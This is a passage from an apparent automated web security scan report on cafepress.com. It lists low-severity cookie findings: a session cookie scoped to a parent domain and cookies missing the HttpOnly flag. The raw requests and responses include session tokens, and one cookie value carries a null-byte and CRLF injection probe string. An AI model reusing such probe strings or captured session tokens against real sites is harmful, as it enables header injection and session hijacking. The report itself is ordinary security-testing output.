cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW14 Cteonnt-Length: 71867 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 71867 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.69. http://www.cafepress.com/make/personalized-ornaments
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/make/personalized-ornaments
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /make/personalized-ornaments HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 54240 Date: Sun, 26 Dec 2010 13:47:59 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 54240 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
2.70. http://www.cafepress.com/sk/TheGamingApe
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/sk/TheGamingApe
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /sk/TheGamingApe HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 174544 Date: Sun, 26 Dec 2010 13:48:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 174544 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
3. Cookie without HttpOnly flag set
previous
next
There are 76 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
3.1. http://www.cafepress.com/
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; 
cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW15 Cteonnt-Length: 75158 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 75158 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.or...[SNIP]...
3.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; 
__utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 301 Moved Permanently Location: http://www.cafepress.com:80/+Eat+Sleep+Game+Light+T-Shirt,299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Content-Length: 0 Date: Sun, 26 Dec 2010 13:44:48 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private
3.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
previous
next
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1 Host: www.cafepress.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; cppid=5185601; xid=0; jid=0; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; cp-v=D0026F27AADDAF9A26C54608326FC1BA; utm_medium=productfeed; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; __utmb_sweepery=1.2.10.1293371031; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%2C%22referrer%22%3A%22None%22%2C%22viewCount%22%3A1%7D; cp_st=; cp_sc=100178; cppss=3x0; 
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmb-UA-11730150-1=1.2.10.1293371031; __utmc-UA-11730150-1=1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmb-UA-12011589-1=1.2.10.1293371032; __utmc-UA-12011589-1=1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmc=265344797; __utmb=265344797.12.10.1293371029; __cmbDomTm=0; __cmbTpvTm=1392
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 Cteonnt-Length: 118606 Vary: Accept-Encoding Date: Sun, 26 Dec 2010 13:56:00 GMT Connection: close Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/ Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/ Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/ Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 118606 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
3.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Summary
Severity:
Low
Confidence:
Firm
Host:
http://www.cafepress.com
Path:
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; 